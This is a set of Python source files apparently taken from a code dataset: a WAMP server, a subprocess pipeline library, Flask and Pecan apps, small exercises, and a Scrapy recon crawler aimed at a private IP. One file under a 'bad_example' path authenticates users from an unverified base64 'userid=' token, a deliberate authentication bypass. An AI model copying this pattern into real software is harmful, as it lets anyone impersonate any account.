session_factory.add(myo.MyoService())\n print('enabled Myo output service')\n if NINJA_ENABLE:\n session_factory.add(ninja_service.NinjaService())\n print('enabled NinjaBocks service')\n\n # 4) create a WAMP-over-WebSocket transport server factory\n transport_factory = websocket.WampWebSocketServerFactory(session_factory,\n debug=True,\n debug_wamp=True)\n # 5) build the loop\n loop = asyncio.get_event_loop()\n coro = loop.create_server(transport_factory, '127.0.0.1', 9000)\n # 6) Connect to MYO\n if MYO_ENABLE:\n loop.run_until_complete(myo.get_factory(loop))\n\n # 7) now start the server and enter the asyncio event loop\n server = loop.run_until_complete(coro)\n try:\n print('running server..')\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n server.close()\n loop.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405160014","text":"\"\"\"\npysh main library\n\"\"\"\nimport logging, subprocess, os, copy, io\n\nlog = logging.getLogger(__name__)\n\nclass Process(object):\n \n def __init__(self, *popen_args, timeout=2, decode_to='utf-8', encode_from='utf-8', procname=None, **popen_kwargs):\n \n # Reference to subprocess.Popen \n self.proc = None\n self.procname = procname\n # other is the Process, if any, that started this Process\n self.other = None\n self.upstream = None\n self.downstream = None\n \n # Arguments to be passed directly to subprocess.Popen\n self.popen_args = list(popen_args)\n self.popen_kwargs = popen_kwargs\n \n # timeout value for Popen.communicate()\n self.timeout = timeout\n # encoding argument for stdout.decode in __str__\n self.decode_to = decode_to\n self.encode_from = encode_from\n \n def __repr__(self):\n procname = self.procname\n if not procname:\n procname = self.popen_args\n return ''.format(procname)\n \n def __bytes__(self):\n \"\"\"\n Get complete stdout as 
bytes. \n Blocks until subprocess is done via subprocess.communicate().\n \"\"\"\n log.debug('__bytes__(self={})'.format(repr(self)))\n\n # Start our process, capturing stdout\n if self.other and self.other.proc and self.other.proc.stdout:\n self.run(stdin=self.other.proc.stdout, stdout=subprocess.PIPE)\n else:\n self.run(stdout=subprocess.PIPE)\n \n # Communicate with our process, blocking until 1) subprocess exits 2) timeout expires\n # Blocking is necessary since __str__ must return a single string.\n try:\n stdout, stderr = self.proc.communicate(timeout=self.timeout)\n except subprocess.TimeoutExpired:\n log.debug('communicate() timeout of {} seconds expired. Killing process: {}'.format(self.timeout, repr(self)))\n self.proc.kill()\n stdout, stderr = self.proc.communicate(timeout=self.timeout)\n \n # Return decoded string, not bytes\n return stdout\n \n def __str__(self):\n \"\"\"\n Get complete stdout as string. String incoding is defined by self.decode_to.\n Blocks until subprocess is done via subprocess.communicate().\n \"\"\"\n log.debug('__str__(self={})'.format(repr(self)))\n return self.__bytes__().decode(self.decode_to)\n \n def __call__(self, *more_popen_args, timeout=None, decode_to=None, encode_from=None, procname=None, **more_popen_kwargs):\n \"\"\"\n Arguments to __call__ mirror, and override, those to __init__. 
\n \"\"\"\n log.debug('__call__(self={}, more_popen_args={}, more_popen_kwargs={})'.format(repr(self), more_popen_args, more_popen_kwargs))\n \n # Clone self\n clone = copy.deepcopy(self)\n \n # Possibly overwrite settings\n if timeout:\n clone.timeout = timeout\n if decode_to:\n clone.decode_to = decode_to\n if encode_from:\n clone.encode_from = encode_from\n if procname:\n clone.procname = procname\n # Append popen arguments to already provided arguments\n clone.popen_args.extend(more_popen_args)\n clone.popen_kwargs.update(more_popen_kwargs)\n\n return clone\n \n def __or__(self, downstream):\n log.debug('__or__(self={}, downstream={})'.format(repr(self), repr(downstream)))\n \n self.other = downstream\n self.downstream = downstream\n \n # Start process if not running, capturing stdout in pipe\n # if not self.proc:\n self.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # Start up other's process if not running\n # if self.downstream and not self.downstream.proc:\n self.downstream.start_by_upstream(upstream=self, stdout=subprocess.PIPE)\n \n # Always return downstream so that we \"or\" forward in the pipeline\n return downstream\n \n def __ror__(self, upstream):\n \"\"\"\n Apparently only called when upstream is not a Process. 
\n \n \"some line\" | more\n \n Returns self so we always move to the right of the pipeline.\n \"\"\"\n log.debug('__ror__(self={}, upstream={})'.format(repr(self), repr(upstream)))\n \n self.other = upstream\n self.upstream = upstream\n \n if isinstance(upstream, str):\n self.run(stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n # Write to self.proc.stdin then close pipe\n self.proc.stdin.write(upstream.encode(self.encode_from))\n self.proc.stdin.flush()\n self.proc.stdin.close()\n \n return self\n \n def __add__(self, other):\n \"\"\"\n # sudo ping www.yahoo.com\n sudo + ping('www.yahoo.com') \n # -> ['sudo', 'ping', 'www.yahoo.com']\n\n Like __call__, this function returns a clone of self.\n \"\"\"\n clone = copy.deepcopy(self)\n clone.popen_args += other.popen_args\n clone.popen_kwargs.update(other.popen_kwargs)\n return clone\n \n def run(self, stdin=None, stdout=None, stderr=None):\n log.debug('run(self={}, stdin={}, stdout={}, stderr={})'.format(repr(self), stdin, stdout, stderr))\n \n # See if our process is already running\n if self.proc and self.proc.poll() is None:\n # Proccess is running\n log.debug('Process is already running')\n return\n\n try:\n # TODO handle stderr\n self.proc = subprocess.Popen(self.popen_args, stdin=stdin, stdout=stdout, **self.popen_kwargs)\n except ValueError as e:\n # log.error(e)\n log.info('Upstream process probably finished before downstream process could read pipe.')\n raise e\n\n def start_by_upstream(self, upstream=None, stdout=None, stderr=None):\n log.debug('start_by_upstream(self={}, upstream={}, stdout={}, stderr={})'.format(repr(self), repr(upstream), stdout, stderr))\n self.other = upstream\n self.upstream = upstream\n self.run(stdin=upstream.proc.stdout, stdout=stdout, stderr=stderr)\n\n def start_by_downstream(self, downstream=None, stdout=None, stderr=None):\n log.debug('start_by_downstream(self={}, downstream={}, stdout={}, stderr={})'.format(repr(self), repr(downstream), stdout, stderr))\n # We don't set stdin 
because downstream can't know what stdin for an upstream Process should be\n self.other = downstream\n self.downstream = downstream\n self.run(stdout=stdout, stderr=stderr)\n\nclass Echo(Process):\n \"\"\"\n Causes upstream process \"other\" to be started and print()ed to terminal.\n Upstream process will be started since its __or__ will be called. \n \"\"\"\n def __repr__(self):\n return ''\n \n def run(self, stdin=None, stdout=None, stderr=None, other=None):\n \"\"\"\n Echo.run() is slightly different than Process.run() because it needs a reference to \n \"other\" in case it has to other.proc.kill()\n \"\"\"\n log.debug('Echo.run(self={}, stdin={}, stdout={})'.format(repr(self), stdin, stdout))\n \n while True:\n # Read from stdout\n try:\n stdout_bytes = stdin.readline()\n except KeyboardInterrupt as e:\n # We often get here if process we are reading from blocks for input and we ctrl+c out\n log.debug('Caught KeyboardInterrupt. Closing stdin pipe')\n stdin.close()\n other.proc.kill()\n stdout_bytes = None\n except ValueError as e:\n log.debug('Caught ValueError. Pipe must be closed')\n stdout_bytes = None\n if not stdout_bytes:\n break\n print(stdout_bytes.decode(encoding=self.decode_to), end='')\n \n # Read from stderr and raise exception if found\n if stderr:\n stderr_bytes = stderr.readline()\n if stderr_bytes:\n raise Exception(stderr_bytes.decode(encoding=self.decode_to))\n\n def start_by_upstream(self, upstream=None, stdout=None, stderr=None):\n log.debug('Echo.start_by_upstream(self={}, upstream={}, stdout={})'.format(repr(self), repr(upstream), stdout))\n self.run(stdin=upstream.proc.stdout, stdout=stdout, stderr=stderr, other=upstream)\n\n def __call__(self, other=None):\n \"\"\"\n echo(pipeline)\n \n TODO\n 1. echo(\"...\", pipeline)\n 2. 
echo(\"...\") | pipeline | echo\n \n \"\"\"\n log.debug('Echo.__call__(self={}, other={})'.format(repr(self), repr(other)))\n if other:\n self.run(stdin=other.proc.stdout)\n\nclass FakeProc():\n \"\"\"\n A fake subprocess.Popen\n \"\"\"\n stdin = None\n stdout = None\n stderr = None\n \n def read_from_pipe(self, pipe):\n \"\"\"\n Read from a pipe until it is empty, then return.\n Blocking, good for communicate() type reads.\n \"\"\"\n output = b''\n while True:\n # Read from stdout\n in_bytes = pipe.readline()\n if not in_bytes:\n break\n output += in_bytes\n return output\n \n def communicate(self, input=None, timeout=None):\n \"\"\"\n Copy of Popen.communicate(input=None, timeout=None)\n \"\"\"\n stdout_bytes, stderr_bytes = None, None\n if self.stdin:\n self.stdin.write(input)\n if self.stdout:\n stdout_bytes = self.read_from_pipe(pipe=self.stdout)\n if self.stderr:\n stderr_bytes = self.read_from_pipe(pipe=self.stderr)\n return (stdout_bytes, stderr_bytes)\n\n#\n# Applications\n#\n\nclass Cd(Process):\n def run(self, stdin=None, stdout=None, stderr=None):\n log.debug('Cd.run(self={}, stdin={}, stdout={}, stderr={})'.format(repr(self), stdin, stdout, stderr))\n self.proc = FakeProc()\n \n # TODO if stdin, read dir name from stdin (?)\n\n # Change to new directory \n new_dir = self.popen_args[-1] \n os.chdir(new_dir)\n \n if stdout == subprocess.PIPE:\n # Open a new pipe\n read_pipe, write_pipe = os.pipe()\n write_fd = os.fdopen(write_pipe, 'w')\n read_fd = os.fdopen(read_pipe, 'r')\n # HACK keep reference to read_fd so it won't be automatically closed \n # when we leave this function\n self.read_fd = read_fd\n # Set our stdout to the 'read' end of our pipe \n self.proc.stdout = io.FileIO(read_fd.fileno(), 'r')\n # Write to the 'write' end of our pipe, then close it\n write_fd.write(new_dir)\n write_fd.flush()\n write_fd.close()\n\n#\n# Standard commands\n#\n\nping = Process('ping')\nmore = Process('more')\ngrep = Process('grep')\n\necho = Echo()\ncd = Cd()\n\n# 
Some hacks for Windows\nif os.name == 'nt':\n ipconfig = Process('ipconfig')\n more = Process('more', shell=True)\n dir = Process('dir')\n pwd = Process('cd', shell=True)\n\n","sub_path":"pysh.py","file_name":"pysh.py","file_ext":"py","file_size_in_byte":11213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597877671","text":"from matplotlib import pyplot as pl\nimport sys\nimport numpy as np\n\n\ndef is_outlier(points, thresh=3.5):\n \"\"\"\n Returns a boolean array with True if points are outliers and False \n otherwise.\n\n Parameters:\n -----------\n points : An numobservations by numdimensions array of observations\n thresh : The modified z-score to use as a threshold. Observations with\n a modified z-score (based on the median absolute deviation) greater\n than this value will be classified as outliers.\n\n Returns:\n --------\n mask : A numobservations-length boolean array.\n\n References:\n ----------\n Boris Iglewicz and David Hoaglin (1993), \"Volume 16: How to Detect and\n Handle Outliers\", The ASQC Basic References in Quality Control:\n Statistical Techniques, Edward F. Mykytka, Ph.D., Editor. 
\n \"\"\"\n if len(points.shape) == 1:\n points = points[:,None]\n median = np.median(points, axis=0)\n diff = np.sum((points - median)**2, axis=-1)\n diff = np.sqrt(diff)\n mad = np.median(diff)\n\n modified_z_score = 0.6745 * diff / mad\n\n return modified_z_score > thresh\n\n\ndef plot_d(dfilename):\n\twith open(dfilename) as df:\n\t\tnext(df)\n\t\tind = 0\n\t\tfor interval in df:\n\t\t\tdata = next(df)\n\t\t\tpl.figure()\n\t\t\tvals = np.array([float(val) for val in data.split()])\n\t\t\tvals[is_outlier(vals)] = float(\"nan\")\n \t \n\t\t\tpl.plot(vals)\n\t\t\tpl.ylim(0, 0.01)\n\t\t\tpl.xlabel(\"Position(bp)\")\n\t\t\tpl.ylabel(\"Probability error\")\n\t\t\tpl.title(dfilename + \", interval %s\" % interval)\n\t\t\tpl.savefig(dfilename+\".%s.png\" % ind) \n\t\t\tpl.close()\n\t\t\tind += 1 \t\n\n\ndef main():\n if len(sys.argv) == 1:\n print(\"Set errors.file to plot distribution...\")\n return\n\n plot_d(sys.argv[1]) \n\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"out/Box_3b.bam_out/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500706563","text":"from rest_framework.authentication import TokenAuthentication\nfrom rest_framework import exceptions\nfrom django.contrib.auth.models import User\nimport base64\nfrom tokens.models import BadToken\n\n\n\nclass BadTokenAuthentication(TokenAuthentication):\n\n\n def authenticate(self, request):\n token = request.META.get(\"HTTP_AUTHORIZATION\")\n if not token:\n return None\n try:\n stringtodecode = token.replace(\"Token\", \"\")\n answer = base64.b64decode(stringtodecode)\n answer2 = answer.decode(\"utf-8\")\n if \"userid=\" in answer2:\n id = answer2.replace(\"userid=\", \"\")\n user = User.objects.filter(pk=id).first()\n else:\n return None\n except User.DoesNotExist:\n raise exceptions.AuthenticationFailed('No such user')\n return (user, 
None)\n\n\n\n","sub_path":"bad_example/tokens/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"384007069","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pecan\nfrom pecan import rest\n\n\nclass Controller(rest.RestController):\n\n @pecan.expose('json')\n def get(self):\n return {\"version\": \"1.0.0\"}\n\n @pecan.expose('json')\n def post(self, **kwargs):\n values = {\n 'row_name': kwargs['row_name'],\n 'location': kwargs['location'],\n 'datacenter_assign': kwargs['datacenter_assign'],\n }\n row = pecan.request.db_api.row_create(\n context=pecan.request.context, values=values)\n return row\n\n @pecan.expose('json')\n def get_all(self):\n datacenter_id = pecan.request.GET.get('datacenter_id', None)\n rows = pecan.request.db_api.row_get_all(context=pecan.request.context,\n datacenter_id=datacenter_id)\n\n for i in rows:\n u_used = 0\n u_sum = 0\n id = i.id\n cabinets = pecan.request.db_api.cabinet_get_all(\n context=pecan.request.context, row_id=id)\n for d in cabinets:\n u_sum = d.u_num +u_sum\n nodes = pecan.request.db_api.node_get_all_cabinet(\n context=pecan.request.context, cabinet_id=d.id)\n racks = pecan.request.db_api.rack_get_all(\n context=pecan.request.context, cabinet_id=d.id)\n node_list=list()\n for node in nodes:\n for height_num in range(node.height):\n rack_num = node.rack_location\n 
rack_location= rack_num + height_num\n node_list.append(rack_location)\n u_used = u_used + len(node_list)\n for use_rack in racks:\n if use_rack.rack_status == 'reserve':\n u_used = u_used +1\n else:\n u_used= u_used + 0\n for rack in racks:\n if int(rack.rack_location) not in node_list and rack.rack_status == 'use':\n u_used = u_used + 1\n i.u_used = u_used\n i.u_sum = u_sum -u_used\n return {\"rows\": rows}\n\n\n @pecan.expose('json')\n def delete(self, id):\n res = pecan.request.db_api.row_delete(\n pecan.request.context, id)\n\n return {'status': res}\n\n @pecan.expose('json')\n def get(self, id):\n row = pecan.request.db_api.row_get(\n pecan.request.context, id)\n\n return row\n\n @pecan.expose('json')\n def put(self, id, **kwargs):\n row = pecan.request.db_api.row_update(\n pecan.request.context, id, kwargs)\n\n return row\n\n\n\n\n","sub_path":"solid/api/controllers/v1/row.py","file_name":"row.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"6098436","text":"from collections import deque\nfrom typing import List\n\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n n = len(board)\n def _convertPos(num):\n # 1: [m-1, 0]\n r, c = divmod(num-1, n)\n\n if r % 2 == 0: # 13(12) -> [2, 0]\n return n-1-r, c\n\n return n-1-r, n-1-c # 12(11) -> [1, 5]\n\n queue = deque()\n queue.append((0, 1))\n seen = set()\n seen.add(1)\n\n while queue:\n steps, pos = queue.popleft()\n x, y = _convertPos(pos)\n\n if board[x][y] != -1:\n pos = board[x][y]\n\n # flag: pay attention to where you put this if statement\n # if we put before board[x][y] != -1, then we will have\n # additional 1 step\n if pos == n*n:\n return steps\n\n for dx in range(1, 7):\n new_pos = pos + dx\n\n if new_pos <= n*n and new_pos not in seen:\n queue.append((steps+1, new_pos))\n seen.add(new_pos)\n return 
-1","sub_path":"Leetcode/909.py","file_name":"909.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456898968","text":"import os, time\nimport subprocess\n\n# to add to start menu in windowns\n# add to C:\\Users\\Lars\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\ndef exitGame(chPid):\n if chPid == os.getpid():\n print(f\"\\nclosing Game\")\n subprocess.call(['Taskkill', '/PID', str(chPid), '/F'], shell=True)\n #subprocess.call(['Taskkill', '/IM', 'python.exe', '/F'], shell=True)\n else:\n print(f\"Procsss: {os.getpid()} not closed, because got {chPid}\")\n\nif __name__ == '__main__': \n exitGame('12345')","sub_path":"web_project/chess/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364278051","text":"import tests_basis\nimport sys\nfrom data_fetching.question_fetcher import get_questions_batch\nfrom data_fetching.data_path import get_path\n\n\ndef test_fn(args):\n batch = get_questions_batch(args[0], args[1], args[2])\n return len(batch)\n\n\ndef main(starting_counter):\n test_args, test_exps = [], []\n\n path = get_path('validation', 'abstract_scenes_v1', 'questions')\n\n test_args.append([29994, 6, path])\n test_exps.append(6)\n\n test_args.append([29900, 32, path])\n test_exps.append(32)\n\n test_args.append([20000, 20, path])\n test_exps.append(20)\n\n tests_basis.create_tests([test_fn] * len(test_args), test_args, test_exps)\n\n return tests_basis.main_tester(\"Testing questions batch loading\", starting_counter)\n\n\nif __name__ == \"__main__\":\n tests_basis.set_options(sys.argv)\n main(1)\n","sub_path":"tests/question_fetcher_test.py","file_name":"question_fetcher_test.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"198953765","text":"n=int(input('Digite o numero de elementos que você deseja ver na sequencia de Fibonacci:'))\nv=2\nt1=0\nt2=1\nt3=0\nprint('{}-{}'.format(t1,t2),end='')\nwhile n!=v:\n t3=t1+t2\n print('-{}'.format(t3)if v<=n else'' ,end='')\n t1=t2\n t2=t3\n v+=1","sub_path":"des63.py","file_name":"des63.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360994071","text":"import requests\r\nimport scrapy\r\nfrom scrapy.crawler import CrawlerProcess\r\n\r\n\r\n# Spider class is used to do web scraping.\r\nclass MapSpider(scrapy.Spider):\r\n name = \"Map_Spider\"\r\n\r\n def parse(self, response):\r\n # identify all the image tags.\r\n css_selector = 'img'\r\n # loop through all the image tags found.\r\n for x in response.css(css_selector):\r\n # get the src attribute from the image tag and extract the value.\r\n newsel = '@src'\r\n image_link = x.xpath(newsel).extract_first()\r\n # check if the value is a jpg image link.\r\n if '.jpg' in image_link or '.jpeg' in image_link:\r\n print(\"Image Link:\", image_link)\r\n # extract the result into json file.\r\n yield {\r\n 'Image Link': image_link,\r\n }\r\n # check if there is a next page.\r\n page_selector = '.next a ::attr(href)'\r\n next_page = response.css(page_selector).extract_first()\r\n if next_page:\r\n # if there is a next page move to the next page.\r\n yield scrapy.Request(response.urljoin(next_page), callback=self.parse)\r\n\r\n\r\ndef recon(url):\r\n # headers are declared to modify the user-agent\r\n headers = {\r\n 'User-Agent': 'Mobile'\r\n }\r\n # requests.get issues a get request to the url, and with the headers parameter,\r\n # the user-agent will be modified.\r\n h = requests.get(url, headers=headers)\r\n print(\"==========Reconnaissance Results==========\")\r\n # retrieves the status code of the response and print OK if the status code is 200.\r\n\r\n url2 = 
'http://172.18.58.238/headers.php'\r\n rh = requests.get(url2, headers=headers)\r\n print(rh.text)\r\n\r\n if h.status_code == 200:\r\n print(\"Status Code: OK (%d)\" % h.status_code)\r\n else:\r\n print(\"Status Code: Failed (%d)\" % h.status_code)\r\n # retrieves the header of the response and print the fields out line by line.\r\n print(\"Header:\")\r\n for x in h.headers:\r\n print(\"\\t \", x, \":\", h.headers[x])\r\n\r\n # content of the response is returned for unit test\r\n return h.text\r\n\r\n\r\ndef map_url(url):\r\n # Create a crawler process to run the scrapy without typing in command line.\r\n # set the output to results.json as a json file and disable logging.\r\n process = CrawlerProcess(settings={\r\n 'FEED_FORMAT': 'json',\r\n 'FEED_URI': 'results.json',\r\n 'LOG_ENABLED': False\r\n })\r\n # set the process to crawl using Map spider and provide the url to crawl\r\n process.crawl(MapSpider, start_urls=[url])\r\n process.start()\r\n\r\n\r\ndef main():\r\n url = 'http://172.18.58.238/snow/'\r\n recon(url)\r\n map_url(url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"reconNmap.py","file_name":"reconNmap.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564754608","text":"# need to import \nimport fresh_tomatoes\nimport media\n\n# create the instances of the Movie class\ntoy_story = media.Movie(\"Toy Story\", \"A Story of a boy and his toys\", \n\t\t\t\t\t\t\"http://www.rotoscopers.com/wp-content/uploads/2013/10/Toy-Story-Poster.jpg\", \n\t\t\t\t\t\t\"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\", \"A movie about blue aliens that are huge tree huggers!\", \n\t\t\t\t\t \"http://t0.gstatic.com/images?q=tbn:ANd9GcQCfmvrE4fMo2cd8esc7mDZPtFSJThAujddMPkRtti1_ij6u-jp\",\n\t\t\t\t\t \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\nschool_of_rock = media.Movie(\"School of Rock\", \"Using rock music to be 
super cool and impress little kids\",\n\t\t\t\t\t\t\t \"https://upload.wikimedia.org/wikipedia/en/1/11/School_of_Rock_Poster.jpg\",\n\t\t\t\t\t\t\t \"https://www.youtube.com/watch?v=XCwy6lW5Ixc\")\n\ntraining_day = media.Movie(\"Training Day\", \"Really cool cop movie about making it on the corrupt streets\",\n\t\t\t\t\t \t \"http://www.impawards.com/2001/posters/training_day_ver1.jpg\",\n\t\t\t\t\t \t \"https://www.youtube.com/watch?v=gKTVQPOH8ZA\")\n\nthe_notebook = media.Movie(\"The Notebook\", \"A really sentimental love story about letting the person \\\n\t\t\t\t\t\t\tyou love go and come back\",\n\t\t\t\t\t\t \"http://www.impawards.com/2004/posters/notebook_ver2.jpg\",\n\t\t\t\t\t\t \"https://www.youtube.com/watch?v=4M7LIcH8C9U\")\n\nthe_hunger_games = media.Movie(\"The Hunger Games\", \"A movie about kids killer each other \\\n\t\t\t\t\t\t\t\tin a weird futuristic world\",\n\t\t\t\t\t\t\t \"http://www.impawards.com/2012/posters/hunger_games_ver23_xlg.jpg\",\n\t\t\t\t\t\t\t \"https://www.youtube.com/watch?v=SMGRhAEn6K0\")\n\n# define movies variable\nmovies = [toy_story, avatar, school_of_rock, training_day, the_notebook, the_hunger_games]\n\n# call webpage\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"movies/entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498499943","text":"def quick_sort(books):\n if len(books) <=1:\n return books\n else:\n pivot = books[0]\n lhs = [item for item in books[1:] if item<= pivot]\n print(\"Left hand Side\", lhs)\n rhs = [item for item in books[1:] if item> pivot]\n print(\"Right hand Side\", rhs)\n print(\"Books: \", books)\n return quick_sort(lhs) + [pivot] + quick_sort(rhs)\n 
\nquick_sort([5,2,8,4,0,1,9,7])","sub_path":"src/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"511315757","text":"from flask import Flask, render_template, request, jsonify, Markup\nimport json\nimport os\nimport sqlite3 #Database management library we used\nimport jinja2\n\n\n#for row in c.execute('SELECT * FROM USIODB'):\n# print row\n\napp = Flask(__name__, static_folder='.', static_url_path='')\n\n# Handler\n@app.route(\"/home.html\")\ndef index():\n return render_template('home.html')\n\n@app.route(\"/pivot_table.html\")\ndef pivot_table():\n\n # Process the Database\n conn = sqlite3.connect('USIODB.db')\n c = conn.cursor()\n\n table = html_table(c)\n\n# for sublist in c.execute('SELECT * FROM USIODB'):\n# print sublist\n c.close()\n conn.close()\n\n return render_template('pivot_table.html',table = Markup(table))\n\ndef html_table(c):\n # Generates table\n table = ''\n\n header = 1\n\n for row in c.execute('SELECT * FROM USIODB'):\n\n table += ''\n if header:\n table+=''\n for data in row:\n table+=''.format(data)\n table+=''\n header = 0\n\n else:\n\n for data in row:\n table+=''.format(data)\n table+=''\n\n table+='
{}
{}
'\n return table\n\n@app.route(\"/pivot_table_builder.html\", methods = ['POST','GET'])\ndef pivot_table_builder():\n if request.method == 'POST':\n # e.g. ImmutableMultiDict([('colLabel', u'Export Inc/Dec'), ('filterName', u'Service Balance'), ('aggregationOf', u'Minimum of'), ('aggregationCol', u'Service Balance'), ('filterQuery', u'<')])\n\n # Check Validation\n try:\n dic = request.form\n colLabel = dic['colLabel']\n filterName = dic['filterName']\n filterQuery = dic['filterQuery']\n aggregationOf = dic['aggregationOf']\n aggregationOf = dic['aggregationCol']\n except KeyError:\n raise RuntimeError('Wrong input')\n \n return render_template('pivot_table_builder')\n \n \n \n return render_template('pivot_table_builder.html')\n\n@app.route(\"/interesting_sights.html\")\ndef interesting_sights():\n return render_template('interesting_sights.html')\n\t\ndef table_selector():\n return false\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='127.0.0.1', port=8765)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247478631","text":"#Enhan Zhao 11097118 CMPT 141(01) L09\n\n\ndef ThreeSUM(in_list):\n \"\"\"\n Determines whether or not there are three integers in the input list that sum to zero.\n :param : in_list a list of integers, any length\n :return: True if in_list contains three integers that sum to zero.\n \"\"\"\n in_list.sort()\n \n if (len(in_list)) < 3:\n return False\n \n for first in range(0, len(in_list) - 2):\n a = in_list[first]\n second = first + 1\n third = len(in_list) - 1\n while second < third:\n b = in_list[second]\n c = in_list[third]\n if a + b + c == 0:\n return True\n if a + b + c > 0:\n third -= 1\n else:\n second += 1\n return False\n\ntest_ThreeSUM = [ {'inputs' : [0, 0, 0],\n 'outputs': True,\n 'reason' : \"should return True as there are 3 zeros in sequence and their sum is zero\"},\n 
{'inputs' : [0, 0, 1],\n 'outputs': False,\n 'reason' : \"should return False, as there is no way for a sum of 0\"},\n {'inputs' : [0, 0],\n 'outputs': False,\n 'reason' : \"even though sequence sum is zero, it only contains 2 items\"},\n {'inputs' : [0, 1],\n 'outputs': False,\n 'reason' : \"sum is not zero, and sequence only contain 2 items\"},\n {'inputs' : [0, 1, 1, 1, 0, 0, 1, 1, 1],\n 'outputs': True,\n 'reason' : \"should return True if function iterates over the first item\"},\n {'inputs' : [1, 1, 1, 1, 0, 0, 1, 1, 0],\n 'outputs': True,\n 'reason' : \"should return True if function iterates over the last item\"},\n {'inputs' : [],\n 'outputs': False,\n 'reason' : \"should return False with empty sequence\"},\n {'inputs' : [0, 10, 0, 10, 0],\n 'outputs': True,\n 'reason' : \"test for when the intergers need for sum 0 is in the beginning, the middle and the end of the sequence\"},\n {'inputs' : [-4, -2, -1, 1, 2, 3],\n 'outputs': True,\n 'reason' : \"test for first second and third are at least one item away from each other\"},\n {'inputs' : [-5, 0, 2, 3],\n 'outputs': True,\n 'reason' : \"test for when first is at least one item away from second and third\"},\n {'inputs' : [- 10, -11, 0, 1, 21, 20],\n 'outputs': True,\n 'reason' : \"test for when third is at least one item away from first and second\"},\n ]\n\n\nfor test in test_ThreeSUM:\n inputs = test['inputs']\n result = ThreeSUM(inputs) \n if result != test['outputs']:\n print('Error: Returned', result, 'on inputs', inputs, '('+str(test['reason'])+')')\n","sub_path":"a8/a8q2_testing.py","file_name":"a8q2_testing.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472214813","text":"import torch\n\nimport constants\nfrom left_padded_conv import LeftPaddedConv\n\n\nclass ConvDecoder(torch.nn.Module):\n\n def __init__(self):\n super(ConvDecoder, self).__init__()\n self.block_dilations = list(\n reversed([2 ** 
i for i in range(constants.NUM_CONV_LAYERS)]))\n self.layers = torch.nn.ModuleList(\n [torch.nn.Linear(constants.ENCODED_BITSEQ_LENGTH,\n constants.WAV_CHUNK_SIZE)] +\n [LeftPaddedConv(\n in_channels=1 if i == 0 else constants.INTERMEDIATE_CHANNEL_DIM,\n out_channels=256 if i == (constants.NUM_CONV_LAYERS - 1) else constants.INTERMEDIATE_CHANNEL_DIM,\n kernel_size=2,\n dilation=dilation\n ) for i, dilation in enumerate(self.block_dilations)]\n )\n\n def forward(self, z):\n current_z = z.unsqueeze(dim=1)\n for i, l in enumerate(self.layers):\n current_z = l(current_z) # intermediate activations?\n return current_z\n","sub_path":"conv_decoder.py","file_name":"conv_decoder.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259849908","text":"### load data from file\ninput_file = open(\"input_lab8.txt\", \"r\")\n\nmarks = []\n\nwhile True:\n line = input_file.readline()\n\n if len(line) == 0:\n break # end of file\n line = line.strip()\n if len(line) == 0:\n continue # skip blank lines\n\n #print(line)\n\n line_break = line.split(\" \")\n marks.append(int(line_break[1].strip()))\n \n#print(marks)\n\n### Calculate statistics\naverage = sum(marks)/len(marks)\nminimum = min(marks)\nmaximum = max(marks)\n\n\n### 